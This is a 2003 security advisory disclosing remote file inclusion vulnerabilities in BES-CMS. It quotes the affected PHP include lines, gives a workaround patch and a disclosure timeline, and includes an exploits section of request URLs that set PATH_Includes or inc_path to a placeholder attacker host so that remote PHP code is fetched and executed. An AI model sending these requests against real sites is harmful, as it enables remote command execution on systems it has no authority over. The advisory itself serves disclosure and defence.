logo Home

Untitled Document
Security Corporation Security Advisories


=================================================
Security Corporation Security Advisory [SCSA-024]

BES-CMS including file vulnerability
=================================================

PROGRAM: BES-CMS
HOMEPAGE: http://bes.h6p.org
VULNERABLE VERSIONS: 0.4 rc3, 0.5 rc3
RISK: MEDIUM/HIGH
IMPACT: Including of file

RELEASE DATE: 2003-12-20


=================================================
TABLE OF CONTENTS
=================================================

1..........................................................DESCRIPTION
2..............................................................DETAILS
3.............................................................EXPLOITS
4............................................................SOLUTIONS
5...........................................................WORKAROUND
6..................................................DISCLOSURE TIMELINE
7..............................................................CREDITS
8...........................................................DISCLAIMER
9...........................................................REFERENCES
10............................................................FEEDBACK


1. DESCRIPTION
=================================================

"Bes-cms is a professional dynamic php website building tool. It was
developped at mokka by a bored programmor. Bes-cms is capable of
creating images galeries, message boards, news sections download
sections contact sections and many more to be added on the
plugin server."

(direct quote from BES-CMS website)


2. DETAILS
=================================================

- Including of file :

A vulnerability has been discovered in BES-CMS that allows remote
attackers to cause the script to include arbitrary PHP code
(allows remote command execution).

In : index.inc.php, Members/index.inc.php, Members/root/index.inc.php,
we can see the following code :

----------------------------------------------------
include_once($PATH__Includes."actions_default.php");
----------------------------------------------------

In the Include/functions_folder.php file :
----------------------------------------------------
include($PATH__Includes.'functions_folder_modules.php');

include($PATH__Includes.'functions_folder_plugins.php');

include($PATH__Includes.'functions_folder_files.php');
----------------------------------------------------

In the Include/functions_hacking.php file :

----------------------------------------------------
switch($_GET['itemID'])
{
case 'usershow':
include_once("".$PATH__Includes."functions_user.php");
Show_USer_Details($_GET['user']);
break;
[...]
case 'send_bug':
if ($UserDetails['LOGGED_IN'] == 'YES')
{
global $PATH__Includes;
include_once("".$PATH__Includes."functions_error.php");
send_bug_report();
}
break;
[...]
case 'content_view':
global $PATH___Includes;
include_once("".$PATH__Includes."functions_message_docTypes.php");
Message_Centent_View($Plugin_Path);
break;

case 'logger':
global $PATH__Includes;
include_once("".$PATH__Includes."functions_users.php");
Loggin_Message();
break;

case 'search':
global $PATH__Includes;
include_once("".$PATH__Includes."functions_general.php");
Display_Search_Results($_POST['search_str']);
break;
[...]
----------------------------------------------------


In the Include/functions_message.php file :

----------------------------------------------------
include($PATH__Includes.'functions_message_docTypes.php');

include($PATH__Includes.'functions_message_edit.php');
----------------------------------------------------

and Include/Start.php file :

-------------------------------------------
include_once($inc_path."Include/vars.php");
-------------------------------------------

All these files are vulnerable...We can see that all inclusions of file
begin by a indefinite variable in the code ($inc_path or $PATH_Includes)
and so could be definite by an attacker.


3. EXPLOITS
=================================================

- Including of file : (if register_globals=ON):

- http://[target]/index.inc.php?PATH_Includes=http://[attacker]/
http://[target]/Members/index.inc.php?PATH_Includes=http://[attacker]/
http://[target]/Members/root/index.inc.php?PATH_Includes=http://[attacker]/

Could include the file : http://[attacker]/actions_default.php

- http://[target]/Include/functions_folder.php?PATH_Includes=
http://[attacker]/

Could include the files : http://[attacker]/functions_folder_modules.php
http://[attacker]/functions_folder_plugins.php
http://[attacker]/functions_folder_files.php

- http://[target]/Include/functions_hacking.php?PATH_Includes=
http://[attacker]/&itemID=usershow

http://[target]/Include/functions_hacking.php?PATH_Includes=
http://[attacker]/&itemID=logger

Could include the file : http://[attacker]/functions_user.php

- http://[target]/Include/functions_hacking.php?PATH_Includes=
http://[attacker]/&itemID=send_bug&UserDetails[LOGGED_IN]=YES

Could include the file : http://[attacker]/functions_error.php

- http://[target]/Include/functions_hacking.php?PATH_Includes=
http://[attacker]/&itemID=content_view

Could include the file : http://[attacker]/functions_message_docTypes.php

- http://[target]/Include/functions_hacking.php?PATH_Includes=
http://[attacker]/&itemID=search

Could include the file : http://[attacker]/functions_general.php

- http://[target]/Include/functions_message.php?PATH_Includes=
http://[attacker]/

Could include the files : http://[attacker]/functions_message_docTypes.php
http://[attacker]/functions_message_edit.php

- http://[target]/Include/Start.php?inc_path=http://[attacker]/

Could include the file : http://[attacker]/Include/vars.php


4. SOLUTIONS
=================================================

You can found patch at the following link : http://www.phpsecure.info

The creator was notified, published a secure version (version 0.5 rc4)

5. WORKAROUND
=================================================

In index.inc.php, Members/index.inc.php, Members/root/index.inc.php,
Include/functions_folder.php, Include/functions_hacking.php and
Include/functions_message.php simply add the following line as FIRST LINE :

-------------------------------------------
if (isset($_REQUEST["PATH__Includes"])){ die("Patched by phpSecure.info");
}
-------------------------------------------

And at the begining of the Include/Start.php file, add the following line
as FIRST LINE :

------------------------------------------------------------------------
if (isset($_REQUEST["inc_path"])){ die("Patched by phpSecure.info"); }
------------------------------------------------------------------------


6. DISCLOSURE TIMELINE
=================================================

13/12/2003 Vulnerability discovered
14/12/2003 Vendor notified
15/12/2003 Vendor response
15/12/2003 Security Corporation clients notified
15/12/2003 Started e-mail discussions
20/12/2003 Last e-mail received
20/12/2003 Public disclosure


7. CREDITS
=================================================

frog-m@n <frog-man@security-corporation.com> from
http://www.phpsecure.info is credited with this discovery


8. DISLAIMER
=================================================

The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of
or in connection with the use or spread of this information. Any use
of this information is at the user's own risk.


9. REFERENCES
=================================================

- Original Version:
http://www.security-corporation.com/advisories-024.html

- Version Fran├žaise:
http://www.security-corporation.com/index.php?id=advisories&a=024-FR


10. FEEDBACK
=================================================

Please send suggestions, updates, and comments to:

Security Corporation
http://www.security-corporation.com/ advisory@security-corporation.com



arrowSearch Advisories

arrowNewsletter

Free weekly Newsletter.

Please enter your email address here:
arrowReport Vulnerability

If you've found a vulnerability please
click here to report it.
arrowPartners

newsnow

About Us | Contact Us | Advertise | email | Backend flag
Copyright © 2016-2017 Security Corporation - All Rights Reserved - Legal - Privacy Policy